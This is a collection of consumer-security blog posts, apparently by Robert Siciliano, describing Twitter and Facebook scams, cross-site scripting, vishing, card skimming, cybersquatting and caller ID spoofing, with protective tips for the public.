Twitter Crime on the Rise

Twitter is now beginning to see a substantial rise in active users. A recent report found that the percentage of Twitter users who have tweeted ten or more times, have more than ten followers, and follow more than ten people rose from 21% to 29% in the first half of 2010.

Spammers, scammers, and thieves are paying attention.

In the physical world, when communities become larger and more densely populated, crime rises. This also applies to online communities, like Twitter and Facebook.

Twitter’s “direct messages” and “mention” functions are laden with spam, often prompting users to click various links. Why anyone would want me to “Take a Good Look at Hypnotherapy” is beyond me, but someone must be buying because the spam keeps coming.

Common Twitter scams include:

Hijacked Accounts: Numerous Twitter (and Facebook) accounts, including those of President Obama, Britney Spears, Fox News and others have been taken over and used to ridicule, harass, or commit fraud.

Social Media Identity Theft: Hundreds of imposter accounts are set up every day. Sarah Palin, St. Louis Cardinals Coach Tony LaRussa, Kanye West, The Huffington Post, and many others have been impersonated by fake Twitter accounts opened in their names.

Worms: Twitter is sometimes plagued by worms, which spread messages encouraging users to click malicious links. When one user clicks, his account is infected and used to further spread the message. Soon his followers and then their followers are all infected.

DOS Attack: A denial-of-service attack left Twitter dark for more than three hours. The attack seems to have been coordinated by Russian hackers targeting a blogger in the Eastern European country of Georgia.

Botnet Controller: One Twitter account produced links pointed to commands to download code that would make users’ computers part of a botnet.

Phishing: Hacked Twitter accounts are used to send phishing messages, which instruct users to click links that point to spoofed sites, where users will be prompted to enter login credentials, putting themselves at risk of identity theft.

Twitter Porn: Please, “Misty Buttons,” stop sending me invites to chat or to check out your pictures.

Twitter Spam: The use of shortened URLs has made Twitter’s 140 character limit the perfect launch pad for spam, shilling diet pills, Viagra and whatever else you don’t need.

To prevent social media identity theft, take ownership of your name or personal brand on Twitter. Protecting yourself from other scams requires some savvy and an unwillingness to click mysterious links. In other cases, you’ll need to keep your web browser and operating system updated in order to remain safe. Make sure to keep your antivirus software updated with the latest definitions, as well.

Robert Siciliano, personal security expert contributor to Just Ask Gemalto, discusses hacking wireless networks on Fox Boston. (Disclosures)

Cross-Site Scripting Criminal Hacks

Secure computing requires an ongoing process, as you learn about risks and then implement processes and technology to protect yourself. Without a concerted effort to defend your data, you will almost certainly by victimized by some type of cyber-invasion.

JavaScript is everywhere, making the Internet pretty and most websites user friendly. Unfortunately, hackers have learned to manipulate this ubiquitous technology for personal gain. Java can be used to launch a cross-site scripting attack, which leverages a vulnerability often found in applications that incorporate Java. The vulnerability allows hackers to insert code into a website you frequent, which will infect your browser and then your PC.

Following links without knowing what they point to, using interacting forms on an untrustworthy site, or viewing online discussion groups or other pages where users may post text containing HTML tags can put your browser at risk.

Facebook, one of the most popular websites, is a likely place for JavaScript hacks, due to cross-site scripting vulnerabilities and the overall lack of security of Facebook users. This allows hackers to read a victim’s private Facebook messages, to access private pictures, to send messages to the victim’s contacts on his or her behalf, to add new (and potentially dangerous) Facebook applications, and to steal the victim’s contacts.

Beware of going down the rabbit hole when browsing the Internet. Once you start clicking link after link, you may find yourself on an infected site. And look out for scams such as contests that require you to paste code into Facebook, your blog, or any other site.

To protect yourself from cross-site scripting attacks, update your browser to the most recent version, with the most current security settings.

McAfee offers a free tool, SiteAdvisor, which helps detect malicious sites. In Firefox, you can install NoScript, a plug-in that lets you control when to enable JavaScript. NoScript also includes a list of good and bad sites. In Chrome, you can disable JavaScript in preferences, and in Internet Explorer, you can fiddle with the settings and adjust “Internet Zones,” but the default settings are best for most people. In Adobe Reader, JavaScript can be disabled all together, under “Edit” and then “Preferences.”

That being said, after messing with default browser or program settings, the reduced functionality may impede your ability to do anything online. The trick is to have the most updated security software and to avoid social engineering scams that ask you to click links or copy code.

Robert Siciliano, personal security expert contributor to Just Ask Gemalto, discusses scammers and thieves on The Big Idea with Donnie Deutsch. (Disclosures)

Top 5 Vishing Techniques

“Vishing” occurs when criminals call victims on the phone and attempt to lure them into divulging personal information that can be used to commit identity theft.

The name comes from “voice,” and “phishing,” which is, of course, the use of spoofed emails designed to trick targets into clicking malicious links. Instead of email, vishing generally relies on automated phone calls, which instruct targets to provide account numbers.

Vishing techniques include:

Wardialing: This is when the visher uses an automated system to call specific area codes with a message involving local or regional banks or credit unions. Once someone answers the phone, a generic or targeted recording begins, requesting that the listener enter bank account, credit, or debit card numbers, along with PIN codes.

VoIP: Voice over Internet Protocol, or VoIP, is an Internet-based phone system that can facilitate vishing by allowing multiple technologies to work in tandem. Vishers are known to use VoIP to make calls, as well as to exploit databases connected to VoIP systems.

Caller ID Spoofing: This is the practice of causing the telephone network to display a false number on the recipient’s caller ID. A number of companies provide tools that facilitate caller ID spoofing. VoIP has known flaws that allow for caller ID spoofing. These tools are typically used to populate the caller ID with a specific bank or credit union, or just with the words “Bank” or “Credit Union.”

Social Engineering: Social engineering is a fancier, more technical form of lying. Social engineering (or social penetration) techniques are used to bypass sophisticated security hardware and software. The automated recordings used by vishers tend to be relatively professional and convincing.

Dumpster Diving: One time and tested “hack” is simply digging through a bank’s dumpster and salvaging any lists of client phone numbers. Once the visher has the list, he can program the numbers into his system for a more targeted attack.

To protect yourself from these scams, educate yourself. Knowledge is the key to defending yourself from vishing. The more you understand it, the better off you’ll be, so read up on vishing incidents, and if your bank provides information about vishing online or in the mail, sit up and pay attention. As this crime becomes more sophisticated, you’ll want to be up to date.

If you receive a phone call from a person or a recording requesting personal information, hang up. If the call purports to be coming from a trusted organization, call that entity directly to confirm their request.

Don’t trust caller ID, which can be tampered with and offers a false sense of security.

Call your bank and report any fraud attempts immediately. The sooner you do, the more quickly the scam will be squashed.

Document the call, noting what was said, what information was requested, and, if possible, the phone number or area code of the caller, and report this to your bank.

Robert Siciliano, personal security expert contributor to Just Ask Gemalto, discusses scammers and thieves on The Big Idea with Donnie Deutsch. (Disclosures)

“Flash Attacks” Make Big Money for Debit and Credit Card Scammers

The latest ATM scam is so brilliantly simple, it’s hard to believe that it actually works. Apparently, banks’ fraud detection systems are unable to flag nearly simultaneous transactions from the same account. This leaves bank customers vulnerable to what’s been termed a “flash attack,” in which multiple scanners use a stolen debit card number to withdraw cash from the same account.

Once a victim’s debit card number has been successfully skimmed, the card can be cloned, say, 100 times, and the cloned cards can be distributed to 100 people. All 100 people can then use the cloned cards to withdraw cash from 100 different ATMs within a brief window of five or ten minutes. If 100 people withdraw $200 each from the same account, at the same time, the scam nets $20,000 in almost no time.

Your credit or debit card number can be skimmed in a number of different ways:

Wedge Skimming: The most common type of skimming occurs when a salesperson or waiter takes your credit or debit card and runs it through a card reader, which copies the information contained in the card’s magnetic stripe. Once the thief has obtained the credit or debit card data, he can then burn the card number to a blank card, or simply use the number to make purchases online or over the phone.

POS Swaps: Many people pay for goods or services by swiping a credit or debit card through the in-store point of sale machines. EFTPOS (electronic funds transfers at the point of sale) skimming occurs when the point of sale terminal has been replaced with a skimming device. In Australia, fast food chains, convenience stores, and specialty clothing stores have been common targets. McDonald’s, for example, has been hit with this scam.

ATM Skimmers: A card reader device can also be placed on the face of an ATM, disguised as part of the machine. It’s almost impossible for the average user to recognize a skimmer unless it is of poor quality, or the user has an eye for security. Often, the thieves will hide a small pinhole camera in a brochure holder, light bar, mirror or car stereo looking speaker on the face of the ATM in order to extract the victim’s pin number. The device may use wireless Bluetooth or cellular technology built to obtain the data remotely. Gas pumps are equally vulnerable to this type of scam.

Data Interceptors: Rather than simply placing a skimmer on the face of a gas pump, some criminals place a data-stealing device inside the pump. Posing as a fuel pump technician, a criminal can use a universal key purchased on eBay to access the terminal. Once inside, they unplug a cable that connects the keypad to the display, and piggyback their own device within the mechanism, in order to capture all the unencrypted card data.

Dummy ATMs: ATMs can easily be purchased through eBay or other outlets, and installed in any heavily trafficked location. The machine, which might be powered by car batteries or plugged into the nearest outlet, is programmed to read and record card data. I found one advertised on Craigslist and picked it up at a nearby bar, for $750 from a guy named Bob.

Once credit card numbers have been skimmed, hackers can copy the data on to blank cards, hotel keys, or “white cards,” which are effective at self-checkouts, or in situations where the thief knows the salesperson and is able to “sweetheart” the transaction. A white card can also be pressed with foils, giving it the appearance of a legitimate credit card.

Federal laws limit cardholder liability to $50 in the case of credit card fraud, as long as the cardholder disputes the charge within 60 days. In order for the $50 limit to apply to debit cards, fraud victims must notify the bank within two days of discovering the fraudulent transactions. After two days, the maximum liability jumps to $500.

When using an ATM, gas pump, or point of sale terminal, always cover your PIN.

As inconvenient as this may seem, regular debit card users should check online statements daily.

Consider limiting your debit card use. I use mine only two or three times a month, for deposits and withdrawals.

Robert Siciliano, personal security expert contributor to Just Ask Gemalto, discusses credit and debit card fraud on CNBC. (Disclosures)

Protecting Children on the Internet

Today’s kids don’t even know what it’s like to not be connected to the Internet. But being technology savvy doesn’t mean they are safe and secure.

Since the Internet as we know it was born in the early 1990s, it has become an integral part of our and our kids’ lives. Online shopping, social media, mobile web, and computers in the classroom are as normal to them as riding a Huffy bicycle was to me. For these kids’ parents, the online world often feels too fast and too complicated. Nevertheless, it is essential that parents educate themselves on safe, secure online practices in order to set a positive example and provide guidance for their children as they navigate the web.

Fortunately, safe and appropriate online behavior isn’t much different than in the real world. The main distinction is that on the Internet, it is necessary to be particularly sensitive regarding how and with whom you communicate.

Parents who lack experience with the Internet, computers, or mobile phones must learn the basics before they can adequately monitor their children’s habits. A parent’s discomfort or unfamiliarity with technology is no excuse to let a child run wild on the Internet.

As with any task, one should start with the fundamentals. In recognition of National Cyber Security Awareness Month, let’s go over some of those fundamentals:

  • Spend as much time as possible with kids in their online world. Learn about the people with whom they interact, the places they visit, and the information they encounter. Be prepared to respond appropriately, regardless of what sort of content they find. Remember, this is family time.
  • One popular tactic has been to set up the computer in a high-traffic family area, and to limit the time children may spend using it. This is still good advice, but it becomes less feasible as more children have their own laptops and mobile phones, which can’t be so easily monitored.
  • Teach children to recognize inappropriate behavior. Kids will be kids, but that doesn’t mean it’s okay to say mean things, send racy pictures, make rude requests, or suggest illegal behavior. If it isn’t okay in the physical world, it isn’t okay on the Internet.
  • Consider investing in computer security software with parental controls, which limit the sites kids can access.
  • Decide exactly what is and is not okay with regards to the kinds of websites kids should visit. This dialogue helps parents and children develop a process for determining appropriate online behavior.
  • Children should be restricted to monitored, age-appropriate chat rooms. Spend time with your children to get a feel for the language and discussion occurring on the websites they wish to visit.
  • Do not allow children to create usernames that reveal their true identities or are provocative.
  • Children should be reminded never to reveal passwords, addresses, phone numbers, or other personal information.
  • Kids should not be permitted to post inappropriate photos or photos that may reveal their identities. (For example, a photo in which a t-shirt bears the name of the child’s city or school.)
  • Never allow a child to meet an online stranger in person.
  • Children should be taught not to open online attachments from strangers.

Robert Siciliano, personal security expert contributor to Just Ask Gemalto, discusses online predators on Fox News. Disclosures

15 Facebook Fiascos to Watch Out For

The following 15 activities, all of which are facilitated by Facebook and other social networking websites, are causing lots of heartache and headaches:

1. Posting illegal activities. In the little town where I grew up, 30 kids recently faced the wrath of their parents, school officials, law enforcement, and the Boston media, all because someone posted their party pictures, which depicted underage drinking, on Facebook. It’s never okay to show illegal behavior.

2. Account hijacking. Phishers imitate the Facebook email template, tricking victims into believing they have received an official Facebook message. Once you enter your login credentials, criminals can take over your account, pose as you, and ask your friend for money. Always log into your Facebook account manually, rather than going through a link in an email.

3. Facebook bullying. It is so much easier to write something awful about someone than it is to say it to them personally. Words hurt. Vicious words have led to kids committing suicide. Friend your kids and see what their online dialogue looks like.

4. Online reputation management (or lack thereof). I’ve seen teachers, professors, students, officials, police, and others from just about every walk of life get fired because of words or pictures they posted on Facebook. Remember, if what you post wouldn’t pass the potential employer test, don’t do it.

5. Social media identity theft. When someone snags your name, posts a photo as you, and begins to communicate while impersonating you, the effects can be devastating. Grab your name on as many sites as possible, including Facebook. Knowem.com can help speed up this process.

6. Financial identity theft. Bad guys use Facebook to crack your passwords. Most online accounts use “qualifying questions” to verify your identity. These questions tend to involve personal information, such as your kids’, other relatives’, or pets’ names or birthdays. When the bad guys find this information on your Facebook page, they can reset your passwords and steal your identity. So limit what you post, and lock down your privacy settings.

7. Burglaries. Criminals have been known to check Facebook statuses to determine if potential victims are home or not. Publicly declaring that you’re not home creates an opportune time for burglars to ransack your house. Never post this information on Facebook.

8. Geo-stalking. Location-based GPS technologies incorporated into social media are perfect tools for stalkers to hone in on their target. Please just turn these settings off.

9. Corporate spying. By posing as an employee, setting up a Facebook group, and inviting all the company’s employees to join, the bad guy gathers intelligence that enables him to commit espionage from within the organization.

10. Harassment. This goes beyond bullying. In one example, a woman was on a camping trip and unreachable by phone when her Facebook account was taken over. The “harasser” wrote all kinds of desperate status updates posing as the woman, leading concerned friends and law enforcement to her house, where they broke down her door.

11. Government spying. Who is that new friend? The AP reports, “U.S. law enforcement agents are following the rest of the Internet world into popular social-networking services, going undercover with false online profiles to communicate with suspects.” Just don’t be a “suspect.”

12. Sex offenders. Facebook is perfect for sex offenders, who pose as real nice people until they gain their victims’ trust. Always be on guard, and do background checks, at least.

13. Scams. It’s just a matter of setting up a fake Facebook page and marketing it to a few people, who then send it to their friends, who send it to their friends. An Ikea scam hooked 40,000 unsuspecting victims with the promise of a $1,000 gift card. Like mom said, if it sounds too good to be true, it’s probably not true.

14. Legal liabilities. In New York, a judge recently ruled that material posted on Facebook and other social networking websites can be used as evidence in court, regardless of whether the posts were hidden by privacy settings.

15. Zero privacy. If you think for one second that what you post on Facebook is for you and your friends’ eyes only, you simply don’t understand how the Internet works. Many sites are capable of pulling data from the bowels of Facebook, despite any privacy settings you may have in place. And that data can be stored forever, which means that it can come back to bite you long after you’ve forgotten you ever posted it.

Robert Siciliano, personal security expert contributor to Just Ask Gemalto, discusses hackers on social media on CNN. Disclosures


Cybersquatting Scams Aren’t Over Yet

Cybersquatting, simply put, is the act of procuring someone else’s trademarked brand name online. The Anti-cybersquatting Consumer Protection Act, a U.S. federal law enacted in 1999, describes cybersquatting as registering, trafficking in, or using a domain name with bad faith intent to profit from the goodwill of a trademark belonging to someone else.

Cybersquatters squat for many reasons. Some squat for fun or because they like the brand or name, while other squatters use the domain to advertise competitors’ wares, or for stalking, harassment, or outright fraud. Most cybersquatters offer to sell the domain at an inflated price to the person or company who owns the trademark contained within the domain name.

In particularly malicious cases of cybersquatting, identity thieves use a domain similar to that of a bank or other trustworthy entity in order to create a spoofed website for phishing. If the desired domain isn’t available, typosquatting is the next best option. After Annualcreditreport.com launched, more than 200 similar domains were quickly snapped up.

Computerworld discussed the havoc that cybersquatting can wreak on a brand’s reputation. Sometimes, criminals copy a brand’s entire website in order to collect usernames and passwords from unwitting visitors. The hackers then test those names and passwords on other websites. Cybersquatting increased by 18% last year, with a documented 440,584 cybersquatting sites in the fourth quarter alone, according to MarkMonitor’s annual Brandjacking Index report.

I’ve written before about the time I was accused of cybersquatting. I wasn’t, I swear! I bought myself some domains in the early 90’s, way before cybersquatting was illegal. I sold some, and regrettably gave up some others. And there was one that will haunt me until the day I die. I owned LedZeppelin.com for five or six years. Led Zeppelin was and is my favorite band, and as a fan, I bought the domain as a keepsake. I would get emails from people all over the world, saying things like, “I am Paulo from Brazil, I love the Led Zep!”

With cybersquatting on the rise, it makes sense to claim your name, your brand name, and your kids’ names as soon as possible. There are numerous new domain extensions coming out all the time. Dot Co recently launched without much fanfare, but it creates a new opportunity for criminals to hijack your brand. I just snagged “siciliano.co.” So go get your domain before the bad guy does!

Robert Siciliano, personal security expert contributor to Just Ask Gemalto, discusses hackers hacking social media on Fox Boston. Disclosures

Criminal Hackers: The Soldiers of the Web Mob

Today’s criminal hackers are very different than those who hacked for fun and fame a decade ago. Every week, I see stories about more criminals in faraway lands, making millions from various scams, emptying the bank accounts of small businesses or draining the financial reserves of entire towns.

High-tech crimes can be committed by lone individuals, by small groups, or by organized web mobs. These web mobs structurally resemble the longtime operation of the Russian and Italian mafias, the Irish mob, the Bandidos, and the Hells Angels.

The Anti-Phishing Working Group has noted the success of Avalanche, a particularly large and successful web mob with an emphasis on phishing: “Phishing has always been attractive to criminals because it has low start-up costs and few barriers to entry. But by mid-2009, phishing was dominated by one player as never before—the ―Avalanche phishing operation. This criminal entity is one of the most sophisticated and damaging on the Internet, and perfected a mass-production system for deploying phishing sites and crimeware– malware designed specifically to automate identity theft and facilitate unauthorized transactions from consumer bank accounts.”

Avalanche was responsible for two-thirds of all phishing attacks launched in the second half of 2009, and for the overall increase in phishing attacks across the Internet.

Cybercrime of this magnitude requires a carefully ordered hierarchy. The players include:

  • Programmers, who write the viruses that will infect victim’s PCs
  • Carders, who sell stolen credit card data
  • IT guys, or black hat computer professionals, who maintain the hardware necessary to keep the operation running
  • Hackers, who look for vulnerabilities in networks and plant malicious code
  • Social engineers, who come up with the scam and write phishing emails to send to potential victims
  • Money mules, who are often foreign, traveling to the US specifically to open bank accounts, and who may also launder money
  • Bosses, who run the show, bring together talent, manage, and delegate

All of this is very real and it is happening right now. Even though data security hasn’t been in the media spotlight this year, we should all be aware of these risks.

To protect yourself from the bad guy, make sure your PC is fully updated with critical security patches, antivirus software, anti-spyware software, a secure wireless connection, and a two-way firewall. Check your online account statements frequently, and consider investing in identity theft protection that monitors your credit reports and monitors your information on the internet’s back ally chat rooms.

Robert Siciliano, personal security expert contributor to Just Ask Gemalto, discusses hackers hacking wireless networks on Fox Boston. Disclosures

7 Tips To Better Credit Card Security

Every time you use a credit card, you increase the chances of that card number being used fraudulently. Cards can be skimmed and hacked in a number of different ways.

#1 Watch your card. Whenever you hand your credit or debit card to a salesperson or waiter, watch to see where your card is taken and what is done with it. It’s normal for the card to be swiped through a point of sale terminal or keyboard card reader. But if you happen to see  your card swiped through an additional reader that doesn’t coincide with the transaction the card number may have been stolen.

#2 Cover your PIN. There may be cameras or “shoulder surfers” recording your PIN at an ATM or point of sale terminal. Cover up the keypad to foil the bad guys’ plan.

#3 Change up your card number. This is inconvenient but effective. The more frequently you change your number, the more secure that number will be. Once or twice a year is good.

#4 Select online shopping websites carefully. When searching for a product or service online, do business only with those you recognize. Established e-retailers are your safest bet.

#5 Beware of phishing. Never purchase products or services by responding to an email. This generally results in your card number being phished.

#6 Use secure sites. Before entering a credit card number, always look for “https” in the address bar. The “s” in “https” means the site has an additional layer of protection that encrypts the card number.

#7 The most important tip of all is to watch your statements. This extra layer of protection requires special attention. If you check your email daily, you ought to be able to check your credit card statements daily, too, right? Once a week is sufficient, and even once every two weeks is okay. Just be sure to refute any unauthorized withdrawals or transactions within the time limit stipulated by your bank. For most credit cards, it’s 60 days, and for debit cards the limit can be 30 days or less.

Robert Siciliano, personal security expert contributor to Just Ask Gemalto, discusses credit card fraud on NBC Boston. Disclosures



Caller ID: Tool for Scammers

Most of us tend to trust the person on the other end of the telephone more than we trust an email in our inbox. However telephone scams continue to plague people and successfully empty the victims bank accounts.

Caller ID spoofing occurs when your phone rings and your caller ID displays a name and number that seem legitimate, but are, in fact, spoofed. The caller has masked his or her true name and number. Most people aren’t aware of caller ID spoofing, and therefore have no reason to question the phone call’s legitimacy.

Caller ID spoofing is often sold as a tool for law enforcement. It can provide a useful disguise if, for instance, a suspect has been withholding child support. But a civilian who suspects a spouse of infidelity might use caller ID spoofing to conduct his or her own investigation. On-call doctors who wish to keep their phone numbers private may need to provide spoofed numbers for clients.

The fraudulent uses for caller ID spoofing vastly outweigh the legitimate ones. Anyone can obtain this technology and pose as law enforcement, a lottery, a charity, a government agency, a credit card company, or anything else that might be lucrative. Abuses of caller ID spoofing have raised hackles with government officials.

Don’t automatically trust the information displayed by you caller ID.

No matter what your caller ID says, never give out personal information over the phone.

If a caller tells you you’ve won something or stand to lose something, tell them you’ll be happy to discuss if further, but that you’ll have to call them back. Then go online, search for a valid number, and call to confirm the details.

Robert Siciliano, personal security expert contributor to Just Ask Gemalto, discusses another databreach on Fox News. Disclosures